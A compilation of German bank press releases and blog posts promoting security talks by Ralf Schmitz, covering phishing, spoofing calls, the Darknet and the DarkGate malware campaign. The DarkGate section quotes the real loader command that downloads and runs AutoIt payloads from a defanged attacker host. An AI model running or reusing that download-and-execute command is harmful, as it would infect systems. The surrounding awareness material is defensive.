Elsen, 01. März 2024 – Die Volksbank Elsen stellt die Sicherheit ihrer Kunden in den Fokus und präsentiert ein exklusives Seminar zum Thema Internetsicherheit bei Banken. Die Veranstaltung – unter der Leitung des renommierten Cybersicherheitsexperten Ralf Schmitz – findet am 17. April 2024 statt und richtet sich an 100 ausgewählte Firmenkunden der Volksbank Elsen-Wewer-Borchen. Internetsicherheit bei Banken im Fokus:

Internetsicherheit bei Banken im Fokus: Exklusiver Vortrag mit Ethical-Hacker Ralf Schmitz am 17. April 2024 in der Volksbank Elsen-Wewer-BorchenExklusiver Vortrag mit Ethical-Hacker Ralf Schmitz am 17. April 2024 in der Volksbank Elsen-Wewer-Borchen.

Ralf Schmitz freut sich darüber, sein Wissen am 17.04.24 auf der Bühne beim „Live-Hacking“ an die geladenen Gäste und Kunden der Volksbank weiterzugeben.

Hintergrund: Die Priorisierung von Internetsicherheit für Banken in Zeiten fortschreitender Digitalisierung gewinnt beim Online-Banking und im Umgang mit persönlichen Finanzdaten zunehmend an Bedeutung. Cyberkriminalität entwickelt sich ständig weiter und Banken stehen im Fokus von Angreifern, die sensible Kundendaten und finanzielle Ressourcen entwenden, fälschen oder fehlleiten wollen.

Daher ist ein proaktiver und praxisrelevanter Ansatz im Bereich der Internetsicherheit entscheidend.

Internetsicherheit bei Banken im Fokus: Exklusiver Vortrag mit Ethical-Hacker Ralf Schmitz am 17. April 2024 in der Volksbank Elsen-Wewer-Borchen

Spoofing-Anrufe, Phishing und der Versand gefälschter E-Mails werden immer häufiger mit raffinierteren Methoden.  Die Betrüger sind so gut geworden, dass es immer schwieriger wird, gefälschte von echten Mails zu unterscheiden. Ralf Schmitz hat viele Beispiele dabei, die er seinem Publikum präsentieren wird.

Ethical-Hacker Ralf Schmitz  

Seminarinhalte: Wissensvermittlung auf höchstem Niveau

Der Hacker-Vortrag von Ralf Schmitz bietet einen umfassenden Überblick über die neuesten Entwicklungen im Bereich der Cyberkriminalität, insbesondere im Bankensektor. Folgende Themen werden behandelt:

1. Aktuelle Bedrohungen im Online-Banking: Ralf Schmitz wird auf die neuesten Trends und Taktiken eingehen, mit denen Cyberkriminelle versuchen, Zugang zu Bankkonten zu bekommen und sensible Informationen abzuschöpfen.
2. Förderung des Sicherheitsbewusstseins: Die Teilnehmer werden dafür sensibilisiert auch für die eigene Sicherheit im Netz zu sorgen. Praktische Tipps und Empfehlungen werden vorgestellt, um das Bewusstsein für potentielle Risiken zu schärfen.
3.  Technologische Lösungen für mehr Sicherheit: Ralf Schmitz wird die fortschrittlichsten Sicherheitslösungen vorstellen, die Banken implementieren können, um ihre Kunden vor Cyber-Bedrohungen zu schützen.
4.  Fragerunde und Interaktion: Die Teilnehmer haben die Möglichkeit, direkt mit Ralf Schmitz zu interagieren und spezifische Fragen zu stellen, um ihr Verständnis von Cybersicherheit für Banken zu vertiefen. .

Über Ralf Schmitz

Ralf Schmitz ist ein renommierter Ethical-Hacker und Cybersicherheitsexperte mit umfangreicher Erfahrung in der Identifizierung und Bekämpfung von Cyberbedrohungen. Sein Ziel ist es, Unternehmen und Banken dabei zu unterstützen, sich effektiv vor digitalen Angriffen zu schützen.

Über die Volksbank Elsen-Wewer-Borchen

Die Volksbank Elsen steht seit über 100 Jahren im Dienste ihrer Mitglieder und Kunden. Mit einem klaren Fokus auf Vertrauen, Service und Innovation ist die Bank bestrebt, die finanziellen Bedürfnisse ihrer Kunden bestmöglich zu erfüllen und gleichzeitig höchste Sicherheitsstandards zu gewährleisten.

Pressekontakt:

Volksbank Elsen, Wewer, Borchen Pressestelle Kontakt: Sabine Fischer Telefon: 05254 661-0 E-Mail: presse (at) volksbank-elsen.de

Hinweis für die Redaktionen: Journalisten, die an der Veranstaltung teilnehmen möchten, werden gebeten, sich vorab zu akkreditieren. Akkreditierungsanfragen können auch an die oben genannte Pressestelle gerichtet werden.

Die Volksbank am Württemberg legt großen Wert auf stetige Investitionen in IT-Sicherheit und Aufklärung im Hinblick auf Cybercrime und Cybersecurity. Cyberrisk & Cybersecurity – Die Volksbank am Württemberg informiert.

Daher veranstaltet die um den Württemberg regional verankerte Bank am 25. April 2024, für Ihre FirmenkundInnen, eine spannende und informative Veranstaltung zum Thema Cyberrisk und Cybersecurity 2024: Aktuelle Tipps und Tricks für Internetsicherheit bei Bankgeschäften, Risiken im Netz sowie Möglichkeiten der Absicherung.

Ralf Schmitz, renommierter Hacker und Sicherheitsexperte, gibt neue Einblicke in die aktuelle Situation und den „Giftschrank der Hackerszene“ sowie die Zukunft der Cyberkriminalität, die immer raffinierter und gefährlicher wird.

„Cyberrisk & Cybersecurity 2024“ – Die Volksbank am Württemberg informiert

Ethical-Hacker Ralf Schmitz

Hacker versuchen mit Phishing, Malware, Ransomware, Social Engineering und anderen Methoden an sensible Daten zu kommen

Er zeigt auf, wie Hacker mit Phishing, Malware, Ransomware, Social Engineering und anderen Methoden versuchen, an sensible Daten und Gelder von BankkundInnen zu gelangen. Er warnt vor den Risiken, die das Internet für die Privatsphäre, die Identität und die Finanzen der NutzerInnen birgt.

Außerdem wird er den TeilnehmerInnen praktische Tipps und Tricks zeigen, wie man sich vor Cyber-Angriffen schützen und sicher im Internet surfen sowie Bankgeschäfte erledigen kann.

Unternehmen Opfer von Cyber- oder Wirtschaftskriminalität

Die Frage ist nicht, ob Ihr Unternehmen Opfer von Cyber- oder Wirtschaftskriminalität wird, sondern nur wann. Auch wenn alle möglichen vorbeugenden Maßnahmen ergriffen sind, ist das Risiko hoch, Opfer krimineller Handlungen zu werden.

Denn Wirtschaftskriminalität und Cyber-Attacken sind in unserer digitalen Welt keine Seltenheit mehr und die damit verbundenen finanziellen Schwierigkeiten können die Existenz Ihres Unternehmens schnell gefährden.

Ganz nach dem Motto „Zukunft digital gestalten und gemeinsam vorausdenken“ erfahren Sie im Vortrag von Ingo Steinwedel von der R+V-Versicherung, wie Sie sich finanziell bestens darauf vorbereiten und wie im Schadensfall die Expertenteams der R+V Sie gemeinsam mit Ihrem IT-Dienstleister praktisch, schnell und zuverlässig unterstützen. Wir freuen uns.

Ingo Steinwedel, Produktförderer MultiLine – R+V Versicherung

Für weitere Informationen kontaktieren Sie bitte:

Volksbank am Württemberg eG

Laura Serby

Tel.: 0711/30501 4303

E-Mail: laura.serby ( at ) voba-aw.de

Web: www.voba-aw.de

Die Sparkassen warnen ihre Kunden vor einer neuen Betrugsmasche, dem so genannten „Spoofing“. Dabei rufen Betrüger die Kunden an und geben sich als Mitarbeiter der Sparkasse aus. Dabei verwenden sie eine gefälschte Telefonnummer, die der echten Sparkassennummer ähnelt. Achtung! Spoofing-Anrufe von Sparkassen.

Die Betrüger versuchen, an die Zugangsdaten zum Online-Banking oder an persönliche Daten der Kunden zu gelangen.

Die Masche ist nicht neu, aber nach wie vor gefährlich. Bereits im vergangenen Jahr haben Sparkassen aus verschiedenen Bundesländern in ihrem Blog über Spoofing-Anrufe berichtet, weiß Sicherheitsexperte Ralf Schmitz.

Die Kriminelle nutzen dabei verschiedene Vorwände, um die Kunden zu täuschen. So wird beispielsweise behauptet, dass der Computer des Kunden von Viren befallen sei, ein neues Sicherheitszertifikat benötigt würden oder eine verdächtige Transaktion auf dem Konto stattgefunden hätte.

Achtung! Spoofing-Anrufe von Sparkassen

Die Betrüger fordern den Kunden dann auf, eine Fernwartungssoftware zu installieren, eine TAN einzugeben oder eine Überweisung zu tätigen.

Die Sparkassen weisen darauf hin, dass sie niemals unaufgefordert anrufen und nach persönlichen Daten oder Zugangsdaten fragen. Kunden sollten solche Anrufe sofort beenden und die Nummer der Sparkasse zurückrufen, um die Echtheit des Anrufs zu überprüfen.

Bei Verdacht auf einen Spoofing-Versuch sollten sich Kunden umgehend mit ihrer Sparkasse in Verbindung setzen und gegebenenfalls den Online-Banking-Zugang oder die Kreditkarte sperren lassen.

Die Sparkassen bieten ihren Kunden verschiedene Möglichkeiten, sich vor Spoofing-Anrufen zu schützen. Dazu gehören unter anderem

– Die Nutzung der Sparkassen-App, die eine sichere TAN-Generierung auf dem Smartphone ermöglicht.

– Die Aktivierung der Funktion „Vertrauenswürdige Geräte“, die nur die Anmeldung von zuvor registrierten Geräten zulässt.

– Die regelmäßige Überprüfung der Kontobewegungen und Umsätze im Online-Banking.

– Die Beachtung der aktuellen Sicherheitshinweise auf der Internetseite der Sparkassen https://www.sparkasse.de/service/sicherheit-im-internet.html

Die Sparkassen nehmen die Sicherheit ihrer Kunden sehr ernst und arbeiten ständig an der Verbesserung ihrer Systeme und Prozesse.

Sie bitten ihre Kunden, wachsam zu sein und verdächtige Vorfälle zu melden. Um die Kunden für das Thema Spoofing zu sensibilisieren, bieten sie auch Sicherheitsvorträge an, in denen der bekannte Ethical-Hacker Ralf Schmitz die Tricks und Methoden der Betrüger aufdeckt.

Ralf Schmitz ist ein ehemaliger Polizeibeamter mit SEK und GSG9 Erfahrung, der heute als Sicherheitsexperte und Trainer tätig ist. In seinen Vorträgen zeigt er, wie einfach es ist, sich als Sparkassenmitarbeiter auszugeben und wie man sich davor schützen kann.

Außerdem erklärt er, wie man Phishing-Mails, Fake-SMS oder andere Betrugsversuche erkennt und vermeidet sowie die Sicherheit am Handy, Tablet oder PC erhöht. 

Die Sicherheitsvorträge von Ralf Schmitz finden in Sparkassen / Banken statt und sind für die Kunden der Sparkasse in der Regel kostenlos.  Die Hacker-Vorträge sind für alle Sparkassen-Kunden, Mitarbeiter und auch Nicht-Kunden geeignet, die mehr über Spoofing und andere Betrugsmaschen erfahren möchten.

Die Sparkassen hoffen, dass die Kunden durch die Vorträge von Ralf Schmitz besser informiert und geschützt werden. Sie appellieren an die Kunden, niemals auf verdächtige Anrufe, E-Mails oder SMS zu reagieren und immer die offiziellen Kontaktwege der Sparkassen zu nutzen.

Die Volksbanken und Raiffeisenbanken warnen ihre Kunden vor einer Zunahme von Phishing-Angriffen in der Weihnachtszeit. Dabei versuchen Betrüger, mit gefälschten E-Mails oder SMS an die Zugangsdaten zum Onlinebanking oder zur VR SecureGo plus-App zu gelangen. Volksbanken warnen ausdrücklich vor diesen Phishing-Angriffen in der Weihnachtszeit

Die Phishing-Nachrichten sind oft täuschend echt gestaltet und enthalten einen Link zu einer gefälschten Webseite, auf der die Kunden ihre Daten eingeben sollen.

Die Betrüger nutzen dabei verschiedene Vorwände, wie zum Beispiel ein Weihnachtsgewinnspiel, eine Aufforderung zu einer notwendigen Umstellung auf ein neues Sicherheitssystem oder eine drohende Sperrung der VR SecureGo plus-App, Betrüger versenden auch gefälschte Booking.com-Nachrichten, um Zugangsdaten zu erlangen oder Kontaktversuche von vermeintlichen Bankmitarbeitern, um TAN-Freigaben für digitale Girocards zu erreichen. Das sind nur einige der perfide Betrugsmaschen, die Hacker Ralf Schmitz in seinen Sicherheitsvorträgen vorstellt.

Die Volksbanken und Raiffeisenbanken weisen darauf hin, dass sie niemals per E-Mail oder SMS nach persönlichen Daten oder Zugangsdaten fragen. Kunden sollten solche Nachrichten sofort löschen und nicht auf Links oder Anhänge klicken. Wenn Kunden einen Phishing-Versuch vermuten, sollten sie sich umgehend an ihre Volksbank oder Raiffeisenbank wenden und gegebenenfalls ihren Online-Banking-Zugang oder ihre Kreditkarte sperren lassen.

Die Volksbanken und Raiffeisenbanken bieten ihren Kunden verschiedene Möglichkeiten, sich vor Phishing-Angriffen zu schützen. Dazu gehören unter anderem:

• Die Nutzung der VR SecureGo plus-App, die eine TAN-Generierung auf dem Smartphone ermöglicht.
• Die Aktivierung der Funktion „Vertrauenswürdige Geräte“, die nur die Anmeldung von zuvor registrierten Geräten erlaubt.
• Die regelmäßige Überprüfung der Kontobewegungen und der digitalen Girocards im Online-Banking.
• Die Beachtung der aktuellen Phishing-Warnungen auf der Webseite der Volksbanken und Raiffeisenbanken https://www.volksbank-eg.de/banking-service/sicherheit/phishing-warnungen.html.

Die Volksbanken und Raiffeisenbanken nehmen die Sicherheit ihrer Kunden sehr ernst und arbeiten ständig daran, ihre Systeme und Prozesse zu verbessern. Sie bitten ihre Kunden, wachsam zu sein und verdächtige Vorfälle zu melden oder die Sicherheitsvorträge zu besuchen.

Es gibt ein paar Wahrheiten über Phishing-Mails: Erstens nerven sie, zweitens werden sie immer ausgefeilter, drittens sind sie eigentlich leicht als Betrugsversuche zu identifizieren. Und zuletzt: Darauf hereinfallen tun immer nur die anderen. Phishing-Mails und die neusten Tricks „Das würde mir doch nie passieren.“

Trotzdem wurde bereits die IT der Uni-Klinik in Düsseldorf komplett zum Stillstand gebracht. Operationen musste abgesagt werden, die Notaufnahme wurde überlastet. Hacker übernahmen sogar die Rechner der Kommunalverwaltung Anhalt-Bitterfeld. Es dauerte acht Monate, bis der Notbetrieb wieder aufgehoben werden konnte. Nur weil irgendjemand so einen blöden Link in einer E-Mail angeklickt hatte.

Was bewegt überhaupt Menschen, auf die Links in solchen Mails zu klicken, obwohl sie es besser wissen müssten? Liegt es an mangelndem Problembewusstsein der Mitarbeiterinnen und Mitarbeiter? An Langeweile? Ein Forscherteam der Friedrich-Alexander-Universität Erlangen ging dieser Frage nach und kam zu der Erkenntnis, dass der Hauptgrund schlichte Neugier ist, gepaart mit einem Inhalt, der einen Bezug zum Empfänger hat. Es ist also mehr ein psychologisches als ein technisches Phänomen.

Phishing-Mails und die neusten Tricks…

In dem zugrundeliegenden Experiment schickten die Wissenschaftler kurz nach Neujahr eine Mail an 1.200 Studentinnen und Studenten. Der Inhalt war ganz unverdächtig und lautete, die Silvesterparty sei toll gewesen und hier seien die Bilder davon. Zusammen mit dem Hinweis, man solle die Bilder niemandem zeigen, der nicht dabei war.

Ergebnisse ließen IT-Verantwortliche blass und Marketing-Spezialisten grün vor Neid werden.

Die Ergebnisse ließen IT-Verantwortliche blass und Marketing-Spezialisten grün vor Neid werden. Die Klickrate betrug stolze 25 Prozent. Also hatten ein Viertel der Adressaten den Link in der E-Mail angeklickt, obwohl die Fete nie stattgefunden hatte. Selbstredend, dass die Wissenschaftlerinnen und Wissenschaftler keinen Schaden anrichteten und lediglich verzeichneten, wer reingefallen war.

Hacker Ralf Schmitz berichtet….

Als man die Versuchspersonen später nach den Gründen für den Klick befragte, sagten 34 Prozent, sie seien einfach neugierig auf die Fotos gewesen, 27 Prozent nannten den passenden Zeitpunkt kurz nach Silvester und 16 Prozent meinten, die Absender-Adresse zu kennen. Diese Zahlen belegen nur den Eindruck, den Sicherheitsverantwortliche in den letzten Jahren gewinnen konnten: Gerade die Aussicht auf Bilder ließ die Angesprochenen auf Links klicken. Und je besser der Text in die gegenwärtige Situation des Empfängers passt, desto wahrscheinlicher ist die Aktion erfolgreich.

Erfolge der Cyber-Kriminellen sind fast schon vorprogrammiert.

Die Erfolge der Cyber-Kriminellen sind fast schon vorprogrammiert. Sie feilen nur noch am Kontext immer genauer. Mit ein wenig Recherche in Sozialen Medien, Facebook bietet sich da an, noch besser sind aber LinkedIn und Xing, ist es kein großer Aufwand, eine Mail auf den Empfänger maßzuschneidern. Wenn nämlich persönliche oder berufliche Details in der E-Mail auftauchen, Firmennamen oder Jobwechsel, lassen diese den Inhalt umso glaubhafter erscheinen. Selbst hier könnte Künstliche Intelligenz helfen, den Betrügern in Zukunft viel Handarbeit zu ersparen.

Die Leiterin der zuvor genannten Studie, Frau Dr. Benenson, sagt wohl zu Recht, dass mit sorgfältiger Planung und Ausführung jeder dazu gebracht werden kann, solch einen Link anzuklicken, und sei es nur aus Neugier. Oder aus Angst, weil angedroht wird, Konten zu sperren oder angeblich teure Bestellungen getätigt zu haben.

Die Cyber-Halunken wenden demnach ganz simple psychologische Tricks an, um die Opfer in die Falle zu locken.

Phishing-Mails wenden psychologische Tricks an!

Was also ist die Konsequenz für Unternehmen und Institute daraus? An einer entsprechenden Schulung der Mitarbeiter, in der sie für die Problematik sensibilisiert werden, führt kein Weg vorbei, dies gilt gerade für technisch weniger versierte Angestellte. Für private Nutzerinnen und Nutzer vielleicht dieser Tipp: Wenn es emotional wird, wenn Neugier oder Angst die Kontrolle übernehmen könnten, die Nachricht sofort löschen. Banken, Sparkassen und Online-Händler schicken niemals emotionale Angelhaken.

Noch fragen sie nach Kontodaten oder wollen persönliche Angaben. Doch, so schade es ist, gibt es keinen 100%-igen Schutz vor digitalem Betrug. Doch es hilft schon, sich einfach mit solchen Themen zu beschäftigen. Denn auch hier macht Übung den Meister.

Eine besonders tückische Malware mit dem Namen „DarkGate“ wird derzeit über Skype- und Teams-Konten übertragen. Hacker verteilen Malware über Microsoft Teams und Skype.

Zur Zeit läuft aktuell eine Hacker-Kampagne, bei der Cyberkriminelle Microsofts Kommunikationsplattformen Skype und Teams missbrauchen, um die Malware

zu verteilen, so der Ethical- Hacker Ralf Schmitz.

 Wie die Angriffe ablaufen und wie Sie sich schützen können erklärt  Ralf Schmitz.

Die Hacker nutzen kompromittierte Skype-Konten, um Nachrichten mit VBA-Loader-Skript-Anhängen zu verschicken, die sich als PDF-Dokument ausgeben.

Der Zugriff auf das Skype-Konto ermöglicht den Hackern, einen bestehenden Nachrichten-Thread zu kapern und die Dateien so zu benennen, dass sie zum Kontext des Chat-Verlaufs passen. Das ist sehr gefährlich. 

Was sich die Betroffenen auf ihren PC herunterladen, ist auf den ersten Blick somit nicht unbedingt zu erkennen.

Nicht alle Virenschutzprogramme erkennen diesen Angriff und so kann in kurzer Zeit eine Vielzahl von Rechnern / Handys infiziert werden, so Hacker Ralf Schmitz. 

So verbreitet sich diese Malware

Diesmal heißt die Malware  „DarkGate“ und verbreitet sich derzeit über Skype- und Teams-Konten.

Hacker verteilen Malware über Microsoft Teams und Skype

Die Masche dieser Malware ist diesmal besonders tückisch. Die Hacker versenden Nachrichten mit VBA-Loader-Skript-Anhängen, so z. B.

C:\Windows\System32\cmd.exe“ /c mkdir c:\zohn & cd /dc:\zohn & copy C:\windows\system32\curl.exe zohn.exe & zohn -o Autoit3.exe hxxp:/ /reactervnamnat[.]com:80 & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz & Autoit3.exe BzpXNT.au3  

um die PCs ihrer Opfer mit der Schadsoftware zu infizieren.

Bestehende Nachrichtenverläufe werden nachgestellt und die Namen der Dateien so gestaltet, dass sie dem Kontext des Chatverlaufs entsprechen, schreibt dazu TrendMicro eine Sicherheitsfirma. 

Die Vorsichtsmaßnahme, nur Dateien von bekannten Kontakten anzunehmen, hilft also bei „DarkGate“ wenig. 

Ein großes Datenleck könnte dahinterstecken!

Es ist zur Zeit noch unklar, wie die Konten der Anwendungen kompromittiert wurden.

Es wird jedoch vermutet, dass dies entweder durch durchgesickerte Zugangsdaten in Untergrundforen oder durch die vorherige Kompromittierung der Mutterorganisation geschah.

Sicherheitstipp von Ethical-Hacker Ralf Schmitz!

Skype- und Teams-Nutzer*innen rät Ralf Schmitz ihre Sicherheitssoftware und Antivirenprogramme immer zu aktualisieren und auch wöchentliche Prüfungen auf Handy, PC, Tablet durchzuführen, um Schadsoftware auf den eigenen Geräten frühzeitig zu erkennen.

Auch Sicherheitsvorträge die solche Angriffe live einmal zeigen und die Ralf Schmitz regelmäßig in Deutschland anbietet, können die Sicherheit erhöhen.  

Auch Virenschutzsoftware von verschiedenen Herstellern, können helfen. Diese darf aber nicht zeitgleich auf allen Geräten ausgeführt werden.

Wenn  Opfer die präparierte Datei angeklickt haben, löst dies den Download und die Ausführung eines AutoIT-Skripts zum Starten der DarkGate-Malware aus. Der Hacker hat nach der erfolgreichen Installation der Malware dann mehrere Optionen.

So ließen sich Informationen stehlen und die Systeme mit verschiedenen Arten von Schadsoftware infizieren, darunter Ransomware, bösartige Fernsteuerungs-Tools und Crypto-Miner.

Außerdem wird gerade beobachtet, dass die Angreifer versuchten, die DarkGate-Malware via Microsoft Teams in Unternehmen und Finanzinstitute einzuschleusen, die den Dienst so konfiguriert haben, dass er Nachrichten von externen Usern akzeptiert. Dabei sendeten die Kriminellen ZIP-Archive mit einer LNK-Datei, die dazu dient, ein VBA-Skript auszuführen.

Das wichtigste Mittel, um Hackerangriffe zu verhindern, ist eine Menge Erfahrung im Netz und Sicherheitssoftware, um solche perfiden Angriffe zu verhindern.

In den letzten Monaten hat die Bedrohung durch Phishing-Angriffe auf Bankkunden bedenklich zugenommen, sagt Hacker Ralf Schmitz . Diese Angriffe haben das Ziel, sensible Kontodaten zu stehlen und finanziellen Schaden anzurichten. Zunahme von Phishing-Angriffen auf Bankkunden und Schutzmaßnahmen.

Angreifer nutzen dabei immer raffiniertere Methoden, um ihre Opfer zu täuschen. Ein aktueller Bericht von ZDF WISO beleuchtet diese wachsende Gefahr und bietet wichtige Einblicke für Verbraucher.

Gestohlene Bankdaten durch Phishing

WISO crime: Virtuellen Bankräubern auf der Spur

Der Bericht „Phishing: Gestohlene Kontodaten“ von ZDF WISO https://www.zdf.de/verbraucher/wiso/phishing-gestohlene-kontodaten-100.html hebt hervor, wie Hacker vorgehen, um an unsere vertraulichen Informationen zu gelangen.

Zunahme von Phishing-Angriffen auf Bankkunden und Schutzmaßnahmen

Diese Angreifer geben sich oft als legitime Institutionen aus, wie Banken oder Regierungsbehörden, und täuschen die Opfer mit gefälschten E-Mails, SMS oder Telefonanrufen. In vielen Fällen werden die Empfänger dazu gedrängt, persönliche Daten preiszugeben oder auf gefährliche Links zu klicken, so Ralf Schmitz.

Solche betrügerischen Aktivitäten können verheerende Folgen für Bankkunden haben. Finanzielle Verluste, Identitätsdiebstahl und der Missbrauch sensibler Informationen sind nur einige der möglichen Konsequenzen. Daher klärt Ralf Schmitz in seinen Hacker-Vorträge Mitarbeiter und Kunden von Kreditinstituten auf, wie man sich richtig schützen kann, denn die Gefahren haben zugenommen.

Es ist von größter Bedeutung, dass Verbraucher sich dieser Gefahr bewusst werden und geeignete Schutzmaßnahmen ergreifen.

Zunahme von Phishing-Angriffen auf Bankkunden und Schutzmaßnahmen

Sicherheitsexperten wie Ralf Schmitz empfehlen, stets misstrauisch gegenüber unerwarteten Nachrichten oder Anfragen zu sein, die persönliche oder finanzielle Informationen erfordern. Vor der Weitergabe von Daten sollte die Echtheit der Anfrage unbedingt überprüft werden, zum Beispiel durch den direkten Kontakt mit der Institution.

Des Weiteren ist es ratsam, starke und einzigartige Passwörter zu verwenden und regelmäßig zu ändern.

Zusätzlich können Sicherheitssoftware und Antivirenprogramme dazu beitragen, Phishing-Angriffe zu erkennen und abzuwehren. Eine umfassende Aufklärung über die Methoden der Angreifer ist der erste Schritt, um sich wirksam vor diesen Bedrohungen zu schützen.

Der Bericht von ZDF WISO unterstreicht die Notwendigkeit einer verstärkten Sensibilisierung der Öffentlichkeit für die Gefahren von Phishing-Angriffen. Es ist von entscheidender Bedeutung, dass Verbraucher informiert und aufgeklärt sind, um ihre persönlichen und finanziellen Informationen zu schützen.

Ein verantwortungsbewusster Umgang mit digitalen Kommunikationsmitteln und ein erhöhtes Bewusstsein für potenzielle Bedrohungen sind von größter Wichtigkeit, um der wachsenden Bedrohung von Phishing-Angriffen wirksam entgegenzuwirken.

Vor einigen Jahren konnten durchschnittliche Internet-Nutzerinnen und -Nutzer mit dem Begriff noch gar nichts anfangen. Doch inzwischen haben schon viele Leute etwas über das Darknet gehört. Meistens jedoch nicht als gute Nachrichten. Denn das Darknet, im Sinne der Starwars-Filme, steht so etwas für die dunkle Seite der Macht. Genauer: des Internets. Dabei ist die Sache im Grunde recht einfach. Was weiß das Darnet über mich?

Das Darknet ist kein eigenes Netzwerk, oder irgendwie unsichtbar. Es ist einfach ein Teil des Internets, das wir beinahe alle meist täglich nutzen. Doch zwei Aspekte unterscheiden das Darknet vom normalen, offenen Internet. Einmal haben dort die Server, auf die zugegriffen wird, keine der gewöhnlichen Namen wie Amazon-PUNKT-de, oder Spiegel-PUNKT-de. Sondern die Websites haben kryptische, ellenlange Namen, die sich keiner merken könnte. Dazu, hier wird es jetzt wortwörtlich dunkel, sind sie nicht herkömmlichen Suchmaschinen zugänglich. Es handelt sich damit um einen anonymen Bereich, der es den Betreibern des Darknets ermöglicht, ihre Identität zu verbergen und so auf Inhalte zuzugreifen, die im regulären Internet nicht zu finden sind.

Doch noch eine zweite Eigenschaft des Darknets ist wichtig. Die Anonymität im Darknet wird durch den Einsatz von speziellen Verschlüsselungstechniken und Anonymisierungsdiensten wie dem Tor-Netzwerk erreicht. Diese Technologien ermöglichen es den Nutzerinnen und Nutzern, ihre tatsächliche so genannte IP-Adresse zu verbergen. Dazu werden die Daten über mehrere Server geleitet, um ihre Identität zu verschleiern. Zwar könnte im Prinzip jeder auf Informationen im Darknet zugreifen, der Internet-Browser „Brave“ hat sogar den Zugang zum Darknet von Haus aus eingebaut. Doch man muss ja erst einmal die komplizierte Adresse im Darknet wissen. Zum Beispiel von einem ominösen Drogen-Händler. Oder eben auch nicht. Dazu gleich mehr.

Was weiß das Darnet über mich?

Allgemein bekannt ist inzwischen, dass im Darknet Informationen und Dienstleistungen angeboten werden, die oft illegal oder zumindest kontrovers sind. Dazu gehören beispielsweise der Handel mit Drogen, Waffen, gestohlenen Daten und gefälschten Dokumenten, Pornografie oder Kreditkartennummern samt PIN.

Es werden auch Bankdaten von Kunden dort gehandelt und es gibt Listen von Finanzinstitute die in nächster Zeit angegriffen werden sollen. So werden dort Sparkassen oder auch Voksbanken genannt.

Es gibt auch Foren und Marktplätze, auf denen illegale Aktivitäten diskutiert und durchgeführt werden. So zu sagen eBay für Verbrecher. Man kann sogar Angriffe auf Server dort bestellen, meistens bei russischen oder nordkoreanischen Hackern, mit anonymen digitalen Zahlungsmitteln. Es können aber auch Morde in Auftrag gegeben werden und die werden mit Bitcoin bezahlt. Leider sind aber auch dort viele persönliche Informationen über einen User zu finden und sogar Kreditkartendaten mit Pins.

Das Darknet wird eben nicht ausschließlich für illegale Aktivitäten genutzt.
Schätzungen, wie viel vom Darknet gesetzeswidrigen Aktivitäten dient, liegen
bei 25 bis 30%.

Es gibt nämlich auch legitime Gründe, warum Menschen das
Darknet nutzen, wie zum Beispiel den Schutz der Privatsphäre in Ländern mit
eingeschränkter Meinungsfreiheit oder den Zugriff auf zensierte Informationen. Journalistinnen und Journalisten kommunizieren über das Darknet aus Ländern wie Russland oder Irak ungefährdet mit ihren Redaktionen zuhause.

Whistleblower geben vertrauliche Informationen aus Unternehmen oder Regierungsstellen an Medien weiter. Weder ist das Darknet nur schwarz, noch das Alltags-Internet nur weiß.

Dennoch ist es wichtig zu betonen, dass die Nutzung des Darknets mit
erheblichen Risiken verbunden ist. Die Anonymität kann dazu führen, dass sich
Kriminelle und Betrüger im Darknet verstecken, was zu finanziellen Verlusten
oder rechtlichen Konsequenzen für die Nutzer führen kann. Es ist daher
ratsam, falls Sie doch einmal neugierig sind, das Darknet mit äußerster
Vorsicht zu nutzen und sich bewusst zu sein, dass illegale Aktivitäten
strafrechtlich verfolgt werden können. Denn wenn am Ende Dinge aus dem Darknet
in Ihrem Alltag landen, ist es vorbei mit der Anonymität. Dann gelten wieder
die gewohnten Regeln, Gesetze und moralisch-ethischen Grenzen. Willkommen auf
der hellen Seite des Internets.

Im Rahmen ihrer jährlichen Vertreterversammlung begrüßt die Volksbank eG,Syke ihre Mitglieder, Kundinnen und Kunden in der historischen Gutsscheune des Gut Varrel in Stuhr.“Live-Hacking“ bei der diesjährigen Vertreterversammlung der Volksbank eG, Syke.

Den über 200 Teilnehmenden wird neben der offiziellen Vertreterversammlung und der Vorstellung des Schulbildungsförderungsprojektes VR-DIGICATION ein 45-minütiger Impulsvortrag über aktuelle Methoden von Cyberkriminalität präsentiert.

Live-Hacking“ bei der diesjährigen Vertreterversammlung der Volksbank eG, Syke 

Sicherheitsexperte und Ethical-Hacker Ralf Schmitz kombiniert langjährige Erfahrung im Sicherheitsbereich mit Humor sowie Fachkompetenz mit interaktiven Einlagen zum Internetschutz bei Bankgeschäften. Das Publikum erhält hiermit fundierte Informationen sowie praxisrelevante Sicherheitstipps.

Sicherheitsexperte Ralf Schmitz (sicher-stark.com)

„Cyberangriffe auf Finanzinstitute nehmen rasant zu“, so der Fachmann für Computer-Sicherheit

Laut dem Bundeslagebild Cybercrime 2021 des Bundeskriminalamtes wies die Polizeiliche Kriminalstatistik (PKS) 146.363 gemeldete Fälle von Cyber-Straftaten auf, was einen Anstieg von Cyber-Kriminalität um mehr als 12 % im Vergleich zum Vorjahr bedeutet und einem neuen Höchststand entspricht.

Dunkelziffer ist sehr groß

Gründe dafür sind u. a. die nationale/internationale Handels-Globalisierung, maximierte Digitalisierung, aber auch die Corona-Pandemie und der russische Angriffskrieg gegen die Ukraine. Der Aufklärungsquote von 29,3 % stehen verbreitete Anonymität im World Wide Web sowie vermehrte Aktionen der Täter aus dem Ausland und eine sehr große Dunkelziffer gegenüber.

Bundeskriminalamt warnt

„Letztendlich kann die Bekämpfung von Cybercrime nur gemeinsam gelingen: im Dreiklang von gefahrenabwehrenden und repressiven Maßnahmen, präventiven IT-Sicherheitsvorkehrungen und einer ausreichenden Sensibilisierung von Bürgern und Unternehmen hinsichtlich der Gefahren bzw. Eintrittsvektoren durch Cybercrime“, so Martina Link, BKA-Vizepräsidentin.

Bankensektor besonders betroffen

Speziell der Bankensektor ist durch Cybercrime gefährdet und erfolgreiche Hackerangriffe sind in dieser Branche besonders brisant. Dabei entsteht nicht nur ein nicht zu kalkulierender monetärer Schaden durch Datendiebstahl/ –verlust und Schadenersatzansprüche, sondern auch eine langanhaltende Imageschädigung sowie Vertrauensverlust des Kunden gegenüber seinem Finanzinstitut, die die zukünftige Zusammenarbeit belasten oder sogar beenden kann.

Aufklärung als präventive Maßnahme

